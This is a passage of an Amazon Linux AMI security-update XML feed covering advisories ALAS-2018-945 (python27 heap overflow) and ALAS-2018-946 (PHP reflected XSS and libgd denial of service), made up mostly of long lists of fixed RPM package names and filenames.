arch="i686"><filename>Packages/kernel-4.9.77-31.58.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.9.77" release="31.58.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.9.77-31.58.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.9.77" release="31.58.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.9.77-31.58.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.9.77" release="31.58.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.9.77-31.58.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.9.77" release="31.58.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.9.77-31.58.amzn1.i686.rpm</filename></package><package name="perf" version="4.9.77" release="31.58.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.9.77-31.58.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.9.77" release="31.58.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-4.9.77-31.58.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-945</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-945: medium priority package update for python27</title><issued date="2018-02-07 17:02:00" /><updated date="2018-02-08 21:23:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-1000158:
CPython (aka Python) up to 2.7.13 is vulnerable to an integer overflow in the PyString_DecodeEscape function in stringobject.c, resulting in heap-based buffer overflow (and possible arbitrary code execution)
1519595:
CVE-2017-1000158 python: Integer overflow in PyString_DecodeEscape results in heap-base buffer overflow
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000158" title="" id="CVE-2017-1000158" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python27-debuginfo" version="2.7.13" release="2.122.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-debuginfo-2.7.13-2.122.amzn1.x86_64.rpm</filename></package><package name="python27" version="2.7.13" release="2.122.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-2.7.13-2.122.amzn1.x86_64.rpm</filename></package><package name="python27-test" version="2.7.13" release="2.122.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-test-2.7.13-2.122.amzn1.x86_64.rpm</filename></package><package name="python27-tools" version="2.7.13" release="2.122.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-tools-2.7.13-2.122.amzn1.x86_64.rpm</filename></package><package name="python27-libs" version="2.7.13" release="2.122.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libs-2.7.13-2.122.amzn1.x86_64.rpm</filename></package><package name="python27-devel" version="2.7.13" release="2.122.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-devel-2.7.13-2.122.amzn1.x86_64.rpm</filename></package><package name="python27" version="2.7.13" release="2.122.amzn1" epoch="0" arch="i686"><filename>Packages/python27-2.7.13-2.122.amzn1.i686.rpm</filename></package><package name="python27-devel" version="2.7.13" release="2.122.amzn1" epoch="0" arch="i686"><filename>Packages/python27-devel-2.7.13-2.122.amzn1.i686.rpm</filename></package><package name="python27-test" version="2.7.13" release="2.122.amzn1" epoch="0" arch="i686"><filename>Packages/python27-test-2.7.13-2.122.amzn1.i686.rpm</filename></package><package name="python27-libs" version="2.7.13" release="2.122.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libs-2.7.13-2.122.amzn1.i686.rpm</filename></package><package name="python27-tools" version="2.7.13" release="2.122.amzn1" epoch="0" arch="i686"><filename>Packages/python27-tools-2.7.13-2.122.amzn1.i686.rpm</filename></package><package name="python27-debuginfo" version="2.7.13" release="2.122.amzn1" epoch="0" arch="i686"><filename>Packages/python27-debuginfo-2.7.13-2.122.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-946</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-946: medium priority package update for php56 php70 php71</title><issued date="2018-02-07 17:10:00" /><updated date="2018-02-08 21:31:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-5712:
An issue was discovered in PHP before 5.6.33, 7.0.x before 7.0.27, 7.1.x before 7.1.13, and 7.2.x before 7.2.1. There is Reflected XSS on the PHAR 404 error page via the URI of a request for a .phar file.
1535251:
CVE-2018-5712 php: reflected XSS in .phar 404 page
CVE-2018-5711:
gd_gif_in.c in the GD Graphics Library (aka libgd), as used in PHP before 5.6.33, 7.0.x before 7.0.27, 7.1.x before 7.1.13, and 7.2.x before 7.2.1, has an integer signedness error that leads to an infinite loop via a crafted GIF file, as demonstrated by a call to the imagecreatefromgif or imagecreatefromstring PHP function. This is related to GetCode_ and gdImageCreateFromGifCtx.
1535246:
CVE-2018-5711 php: Denial of Service (DoS) via infinite loop in libgd gdImageCreateFromGifCtx function in ext/gd/libgd/gd_gif_in.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5711" title="" id="CVE-2018-5711" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5712" title="" id="CVE-2018-5712" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php71-debuginfo" version="7.1.13" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-debuginfo-7.1.13-1.30.amzn1.x86_64.rpm</filename></package><package name="php71-gd" version="7.1.13" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-gd-7.1.13-1.30.amzn1.x86_64.rpm</filename></package><package name="php71-odbc" version="7.1.13" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-odbc-7.1.13-1.30.amzn1.x86_64.rpm</filename></package><package name="php71-process" version="7.1.13" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-process-7.1.13-1.30.amzn1.x86_64.rpm</filename></package><package name="php71-imap" version="7.1.13" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-imap-7.1.13-1.30.amzn1.x86_64.rpm</filename></package><package name="php71-mbstring" version="7.1.13" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mbstring-7.1.13-1.30.amzn1.x86_64.rpm</filename></package><package name="php71-mcrypt" version="7.1.13" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mcrypt-7.1.13-1.30.amzn1.x86_64.rpm</filename></package><package name="php71-gmp" version="7.1.13" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-gmp-7.1.13-1.30.amzn1.x86_64.rpm</filename></package><package name="php71-soap" version="7.1.13" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-soap-7.1.13-1.30.amzn1.x86_64.rpm</filename></package><package name="php71-ldap" version="7.1.13" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-ldap-7.1.13-1.30.amzn1.x86_64.rpm</filename></package><package name="php71-snmp" version="7.1.13" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-snmp-7.1.13-1.30.amzn1.x86_64.rpm</filename></package><package name="php71-enchant" version="7.1.13" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-enchant-7.1.13-1.30.amzn1.x86_64.rpm</filename></package><package name="php71-tidy" version="7.1.13" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-tidy-7.1.13-1.30.amzn1.x86_64.rpm</filename></package><package name="php71-pdo-dblib" version="7.1.13" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pdo-dblib-7.1.13-1.30.amzn1.x86_64.rpm</filename></package><package name="php71-json" version="7.1.13" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-json-7.1.13-1.30.amzn1.x86_64.rpm</filename></package><package name="php71-embedded" version="7.1.13" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-embedded-7.1.13-1.30.amzn1.x86_64.rpm</filename></package><package name="php71-devel" version="7.1.13" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-devel-7.1.13-1.30.amzn1.x86_64.rpm</filename></package><package name="php71" version="7.1.13" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-7.1.13-1.30.amzn1.x86_64.rpm</filename></package><package name="php71-pspell" version="7.1.13" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pspell-7.1.13-1.30.amzn1.x86_64.rpm</filename></package><package name="php71-common" version="7.1.13" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-common-7.1.13-1.30.amzn1.x86_64.rpm</filename></package><package name="php71-recode" version="7.1.13" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-recode-7.1.13-1.30.amzn1.x86_64.rpm</filename></package><package name="php71-xmlrpc" version="7.1.13" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-xmlrpc-7.1.13-1.30.amzn1.x86_64.rpm</filename></package><package name="php71-pgsql" version="7.1.13" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pgsql-7.1.13-1.30.amzn1.x86_64.rpm</filename></package><package name="php71-cli" version="7.1.13" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-cli-7.1.13-1.30.amzn1.x86_64.rpm</filename></package><package name="php71-dbg" version="7.1.13" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-dbg-7.1.13-1.30.amzn1.x86_64.rpm</filename></package><package name="php71-xml" version="7.1.13" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-xml-7.1.13-1.30.amzn1.x86_64.rpm</filename></package><package name="php71-opcache" version="7.1.13" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-opcache-7.1.13-1.30.amzn1.x86_64.rpm</filename></package><package name="php71-fpm" version="7.1.13" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-fpm-7.1.13-1.30.amzn1.x86_64.rpm</filename></package><package name="php71-mysqlnd" version="7.1.13" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mysqlnd-7.1.13-1.30.amzn1.x86_64.rpm</filename></package><package name="php71-dba" version="7.1.13" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-dba-7.1.13-1.30.amzn1.x86_64.rpm</filename></package><package name="php71-intl" version="7.1.13" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-intl-7.1.13-1.30.amzn1.x86_64.rpm</filename></package><package name="php71-pdo" version="7.1.13" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pdo-7.1.13-1.30.amzn1.x86_64.rpm</filename></package><package name="php71-bcmath" version="7.1.13" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-bcmath-7.1.13-1.30.amzn1.x86_64.rpm</filename></package><package name="php71-soap" version="7.1.13" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php71-soap-7.1.13-1.30.amzn1.i686.rpm</filename></package><package name="php71-intl" version="7.1.13" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php71-intl-7.1.13-1.30.amzn1.i686.rpm</filename></package><package name="php71-ldap" version="7.1.13" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php71-ldap-7.1.13-1.30.amzn1.i686.rpm</filename></package><package name="php71" version="7.1.13" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php71-7.1.13-1.30.amzn1.i686.rpm</filename></package><package name="php71-pspell" version="7.1.13" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pspell-7.1.13-1.30.amzn1.i686.rpm</filename></package><package name="php71-opcache" version="7.1.13" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php71-opcache-7.1.13-1.30.amzn1.i686.rpm</filename></package><package name="php71-gmp" version="7.1.13" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php71-gmp-7.1.13-1.30.amzn1.i686.rpm</filename></package><package name="php71-snmp" version="7.1.13" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php71-snmp-7.1.13-1.30.amzn1.i686.rpm</filename></package><package name="php71-odbc" version="7.1.13" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php71-odbc-7.1.13-1.30.amzn1.i686.rpm</filename></package><package name="php71-embedded" version="7.1.13" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php71-embedded-7.1.13-1.30.amzn1.i686.rpm</filename></package><package name="php71-pgsql" version="7.1.13" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pgsql-7.1.13-1.30.amzn1.i686.rpm</filename></package><package name="php71-tidy" version="7.1.13" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php71-tidy-7.1.13-1.30.amzn1.i686.rpm</filename></package><package name="php71-xmlrpc" version="7.1.13" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php71-xmlrpc-7.1.13-1.30.amzn1.i686.rpm</filename></package><package name="php71-imap" version="7.1.13" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php71-imap-7.1.13-1.30.amzn1.i686.rpm</filename></package><package name="php71-process" version="7.1.13" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php71-process-7.1.13-1.30.amzn1.i686.rpm</filename></package><package name="php71-bcmath" version="7.1.13" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php71-bcmath-7.1.13-1.30.amzn1.i686.rpm</filename></package><package name="php71-debuginfo" version="7.1.13" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php71-debuginfo-7.1.13-1.30.amzn1.i686.rpm</filename></package><package name="php71-json" version="7.1.13" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php71-json-7.1.13-1.30.amzn1.i686.rpm</filename></package><package name="php71-pdo-dblib" version="7.1.13" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pdo-dblib-7.1.13-1.30.amzn1.i686.rpm</filename></package><package name="php71-dba" version="7.1.13" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php71-dba-7.1.13-1.30.amzn1.i686.rpm</filename></package><package name="php71-dbg" version="7.1.13" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php71-dbg-7.1.13-1.30.amzn1.i686.rpm</filename></package><package name="php71-mbstring" version="7.1.13" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mbstring-7.1.13-1.30.amzn1.i686.rpm</filename></package><package name="php71-fpm" version="7.1.13" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php71-fpm-7.1.13-1.30.amzn1.i686.rpm</filename></package><package name="php71-mysqlnd" version="7.1.13" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mysqlnd-7.1.13-1.30.amzn1.i686.rpm</filename></package><package name="php71-mcrypt" version="7.1.13" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mcrypt-7.1.13-1.30.amzn1.i686.rpm</filename></package><package name="php71-cli" version="7.1.13" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php71-cli-7.1.13-1.30.amzn1.i686.rpm</filename></package><package name="php71-common" version="7.1.13" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php71-common-7.1.13-1.30.amzn1.i686.rpm</filename></package><package name="php71-recode" version="7.1.13" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php71-recode-7.1.13-1.30.amzn1.i686.rpm</filename></package><package name="php71-devel" version="7.1.13" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php71-devel-7.1.13-1.30.amzn1.i686.rpm</filename></package><package name="php71-enchant" version="7.1.13" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php71-enchant-7.1.13-1.30.amzn1.i686.rpm</filename></package><package name="php71-gd" version="7.1.13" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php71-gd-7.1.13-1.30.amzn1.i686.rpm</filename></package><package name="php71-pdo" version="7.1.13" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pdo-7.1.13-1.30.amzn1.i686.rpm</filename></package><package name="php71-xml" version="7.1.13" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php71-xml-7.1.13-1.30.amzn1.i686.rpm</filename></package><package name="php70-debuginfo" version="7.0.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-debuginfo-7.0.27-1.27.amzn1.x86_64.rpm</filename></package><package name="php70-dba" version="7.0.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-dba-7.0.27-1.27.amzn1.x86_64.rpm</filename></package><package name="php70-mcrypt" version="7.0.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-mcrypt-7.0.27-1.27.amzn1.x86_64.rpm</filename></package><package name="php70" version="7.0.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-7.0.27-1.27.amzn1.x86_64.rpm</filename></package><package name="php70-tidy" version="7.0.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-tidy-7.0.27-1.27.amzn1.x86_64.rpm</filename></package><package name="php70-bcmath" version="7.0.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-bcmath-7.0.27-1.27.amzn1.x86_64.rpm</filename></package><package name="php70-opcache" version="7.0.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-opcache-7.0.27-1.27.amzn1.x86_64.rpm</filename></package><package name="php70-fpm" version="7.0.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-fpm-7.0.27-1.27.amzn1.x86_64.rpm</filename></package><package name="php70-pdo" version="7.0.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pdo-7.0.27-1.27.amzn1.x86_64.rpm</filename></package><package name="php70-mysqlnd" version="7.0.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-mysqlnd-7.0.27-1.27.amzn1.x86_64.rpm</filename></package><package name="php70-dbg" version="7.0.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-dbg-7.0.27-1.27.amzn1.x86_64.rpm</filename></package><package name="php70-gmp" version="7.0.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-gmp-7.0.27-1.27.amzn1.x86_64.rpm</filename></package><package name="php70-process" version="7.0.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-process-7.0.27-1.27.amzn1.x86_64.rpm</filename></package><package name="php70-imap" version="7.0.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-imap-7.0.27-1.27.amzn1.x86_64.rpm</filename></package><package name="php70-snmp" version="7.0.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-snmp-7.0.27-1.27.amzn1.x86_64.rpm</filename></package><package name="php70-cli" version="7.0.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-cli-7.0.27-1.27.amzn1.x86_64.rpm</filename></package><package name="php70-ldap" version="7.0.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-ldap-7.0.27-1.27.amzn1.x86_64.rpm</filename></package><package name="php70-enchant" version="7.0.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-enchant-7.0.27-1.27.amzn1.x86_64.rpm</filename></package><package name="php70-intl" version="7.0.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-intl-7.0.27-1.27.amzn1.x86_64.rpm</filename></package><package name="php70-odbc" version="7.0.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-odbc-7.0.27-1.27.amzn1.x86_64.rpm</filename></package><package name="php70-json" version="7.0.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-json-7.0.27-1.27.amzn1.x86_64.rpm</filename></package><package name="php70-devel" version="7.0.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-devel-7.0.27-1.27.amzn1.x86_64.rpm</filename></package><package name="php70-recode" version="7.0.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-recode-7.0.27-1.27.amzn1.x86_64.rpm</filename></package><package name="php70-pspell" version="7.0.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pspell-7.0.27-1.27.amzn1.x86_64.rpm</filename></package><package name="php70-common" version="7.0.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-common-7.0.27-1.27.amzn1.x86_64.rpm</filename></package><package name="php70-soap" version="7.0.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-soap-7.0.27-1.27.amzn1.x86_64.rpm</filename></package><package name="php70-xml" version="7.0.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-xml-7.0.27-1.27.amzn1.x86_64.rpm</filename></package><package name="php70-xmlrpc" version="7.0.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-xmlrpc-7.0.27-1.27.amzn1.x86_64.rpm</filename></package><package name="php70-pdo-dblib" version="7.0.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pdo-dblib-7.0.27-1.27.amzn1.x86_64.rpm</filename></package><package name="php70-pgsql" version="7.0.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pgsql-7.0.27-1.27.amzn1.x86_64.rpm</filename></package><package name="php70-gd" version="7.0.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-gd-7.0.27-1.27.amzn1.x86_64.rpm</filename></package><package name="php70-zip" version="7.0.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-zip-7.0.27-1.27.amzn1.x86_64.rpm</filename></package><package name="php70-embedded" version="7.0.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-embedded-7.0.27-1.27.amzn1.x86_64.rpm</filename></package><package name="php70-mbstring" version="7.0.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-mbstring-7.0.27-1.27.amzn1.x86_64.rpm</filename></package><package name="php70-mysqlnd" version="7.0.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/php70-mysqlnd-7.0.27-1.27.amzn1.i686.rpm</filename></package><package name="php70-snmp" version="7.0.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/php70-snmp-7.0.27-1.27.amzn1.i686.rpm</filename></package><package name="php70-pdo" version="7.0.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pdo-7.0.27-1.27.amzn1.i686.rpm</filename></package><package name="php70-bcmath" version="7.0.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/php70-bcmath-7.0.27-1.27.amzn1.i686.rpm</filename></package><package name="php70-gmp" version="7.0.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/php70-gmp-7.0.27-1.27.amzn1.i686.rpm</filename></package><package name="php70-dbg" version="7.0.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/php70-dbg-7.0.27-1.27.amzn1.i686.rpm</filename></package><package name="php70-soap" version="7.0.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/php70-soap-7.0.27-1.27.amzn1.i686.rpm</filename></package><package name="php70-embedded" version="7.0.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/php70-embedded-7.0.27-1.27.amzn1.i686.rpm</filename></package><package name="php70-pgsql" version="7.0.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pgsql-7.0.27-1.27.amzn1.i686.rpm</filename></package><package name="php70-ldap" version="7.0.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/php70-ldap-7.0.27-1.27.amzn1.i686.rpm</filename></package><package name="php70-recode" version="7.0.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/php70-recode-7.0.27-1.27.amzn1.i686.rpm</filename></package><package name="php70-devel" version="7.0.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/php70-devel-7.0.27-1.27.amzn1.i686.rpm</filename></package><package name="php70-mbstring" version="7.0.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/php70-mbstring-7.0.27-1.27.amzn1.i686.rpm</filename></package><package name="php70-odbc" version="7.0.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/php70-odbc-7.0.27-1.27.amzn1.i686.rpm</filename></package><package name="php70-opcache" version="7.0.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/php70-opcache-7.0.27-1.27.amzn1.i686.rpm</filename></package><package name="php70-enchant" version="7.0.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/php70-enchant-7.0.27-1.27.amzn1.i686.rpm</filename></package><package name="php70-common" version="7.0.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/php70-common-7.0.27-1.27.amzn1.i686.rpm</filename></package><package name="php70-imap" version="7.0.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/php70-imap-7.0.27-1.27.amzn1.i686.rpm</filename></package><package name="php70-mcrypt" version="7.0.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/php70-mcrypt-7.0.27-1.27.amzn1.i686.rpm</filename></package><package name="php70-tidy" version="7.0.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/php70-tidy-7.0.27-1.27.amzn1.i686.rpm</filename></package><package name="php70-intl" version="7.0.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/php70-intl-7.0.27-1.27.amzn1.i686.rpm</filename></package><package name="php70-gd" version="7.0.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/php70-gd-7.0.27-1.27.amzn1.i686.rpm</filename></package><package name="php70-xml" version="7.0.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/php70-xml-7.0.27-1.27.amzn1.i686.rpm</filename></package><package name="php70-xmlrpc" version="7.0.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/php70-xmlrpc-7.0.27-1.27.amzn1.i686.rpm</filename></package><package name="php70-zip" version="7.0.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/php70-zip-7.0.27-1.27.amzn1.i686.rpm</filename></package><package name="php70-cli" version="7.0.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/php70-cli-7.0.27-1.27.amzn1.i686.rpm</filename></package><package name="php70-fpm" version="7.0.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/php70-fpm-7.0.27-1.27.amzn1.i686.rpm</filename></package><package name="php70-process" version="7.0.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/php70-process-7.0.27-1.27.amzn1.i686.rpm</filename></package><package name="php70-dba" version="7.0.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/php70-dba-7.0.27-1.27.amzn1.i686.rpm</filename></package><package name="php70" version="7.0.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/php70-7.0.27-1.27.amzn1.i686.rpm</filename></package><package name="php70-pspell" version="7.0.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pspell-7.0.27-1.27.amzn1.i686.rpm</filename></package><package name="php70-json" version="7.0.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/php70-json-7.0.27-1.27.amzn1.i686.rpm</filename></package><package name="php70-pdo-dblib" version="7.0.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pdo-dblib-7.0.27-1.27.amzn1.i686.rpm</filename></package><package name="php70-debuginfo" version="7.0.27" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/php70-debuginfo-7.0.27-1.27.amzn1.i686.rpm</filename></package><package name="php56-intl" version="5.6.33" release="1.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-intl-5.6.33-1.136.amzn1.x86_64.rpm</filename></package><package name="php56-cli" version="5.6.33" release="1.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-cli-5.6.33-1.136.amzn1.x86_64.rpm</filename></package><package name="php56-pspell" version="5.6.33" release="1.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pspell-5.6.33-1.136.amzn1.x86_64.rpm</filename></package><package name="php56-gmp" version="5.6.33" release="1.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gmp-5.6.33-1.136.amzn1.x86_64.rpm</filename></package><package name="php56-soap" version="5.6.33" release="1.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-soap-5.6.33-1.136.amzn1.x86_64.rpm</filename></package><package name="php56-devel" version="5.6.33" release="1.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-devel-5.6.33-1.136.amzn1.x86_64.rpm</filename></package><package name="php56-process" version="5.6.33" release="1.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-process-5.6.33-1.136.amzn1.x86_64.rpm</filename></package><package name="php56-enchant" version="5.6.33" release="1.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-enchant-5.6.33-1.136.amzn1.x86_64.rpm</filename></package><package name="php56-xml" version="5.6.33" release="1.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xml-5.6.33-1.136.amzn1.x86_64.rpm</filename></package><package name="php56-mssql" version="5.6.33" release="1.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mssql-5.6.33-1.136.amzn1.x86_64.rpm</filename></package><package name="php56-snmp" version="5.6.33" release="1.136.amzn1" 